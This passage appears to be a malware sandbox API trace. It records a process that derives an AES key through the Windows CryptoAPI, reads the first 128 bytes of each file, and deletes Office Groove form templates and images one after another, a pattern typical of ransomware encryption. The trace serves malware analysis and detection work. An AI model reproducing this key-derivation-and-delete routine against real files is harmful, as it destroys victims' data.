(lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsimagetemplate.html")) returned 1 [0171.051] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.052] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.052] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.052] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.052] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x858 [0171.052] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.061] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.062] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.062] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.063] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsmacrotemplate.html")) returned 1 [0171.119] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.120] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.120] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.120] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.120] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x46ff [0171.120] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.137] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.137] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.138] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.139] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formspreviewtemplate.html")) returned 1 [0171.140] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.141] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.141] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.141] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.141] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4709 [0171.141] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.147] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.147] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.147] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.149] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formspreviewtemplatertl.html")) returned 1 [0171.150] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.151] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.151] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.151] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.151] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5bf [0171.151] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.164] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.164] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.164] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.165] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsprinttemplate.html")) returned 1 [0171.167] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.167] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.167] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.167] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.167] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5c9 [0171.167] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.170] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.170] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.170] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.171] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsprinttemplatertl.html")) returned 1 [0171.172] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.173] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.173] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.173] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.173] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1499 [0171.173] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.200] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.200] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.200] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.201] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsviewattachmenticons.jpg")) returned 1 [0171.203] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.204] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.204] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.204] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.204] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x638 [0171.204] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.207] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.207] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.207] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.209] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsviewattachmenticonsmask.bmp")) returned 1 [0171.212] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.212] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.212] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.212] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.212] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x26b4 [0171.213] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.221] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.221] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.221] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.223] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\form_edit.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\form_edit.js")) returned 1 [0171.225] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.226] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.226] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.226] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.226] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x14316 [0171.226] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.239] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.239] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.239] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.240] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\infopathwelcomeimage.jpg")) returned 1 [0171.242] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.243] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.243] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.243] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.243] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30074 [0171.243] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.276] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.276] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.276] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.278] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\macroprogress.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\macroprogress.gif")) returned 1 [0171.282] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.282] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.282] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.282] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.282] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x275e [0171.282] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.300] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.300] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.300] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.301] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\PublicFunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\publicfunctions.js")) returned 1 [0171.303] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.304] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.304] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.304] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.304] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x350 [0171.304] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.316] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.316] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.316] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.317] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_alignleft.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_alignleft.gif")) returned 1 [0171.319] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.320] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.320] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.320] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.320] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x34f [0171.320] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.322] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.322] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.322] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.324] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_alignright.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_alignright.gif")) returned 1 [0171.325] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.326] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.326] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.326] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.326] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x365 [0171.326] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.333] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.333] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.333] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.335] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_bullets.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_bullets.gif")) returned 1 [0171.337] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.337] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.337] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.337] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.337] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x34f [0171.337] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.340] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.340] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.340] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.342] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_center.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_center.gif")) returned 1 [0171.343] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.344] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.344] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.344] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.344] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ee [0171.344] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.347] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.347] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.347] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.349] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_choosecolor.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_choosecolor.gif")) returned 1 [0171.350] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.351] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.351] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.351] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.351] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x35f [0171.351] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.354] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.354] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.354] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.356] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_decreaseindent.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_decreaseindent.gif")) returned 1 [0171.357] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.358] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.358] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.358] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.358] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf1 [0171.358] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.360] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.360] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.360] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.361] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_hyperlink.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_hyperlink.gif")) returned 1 [0171.363] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft 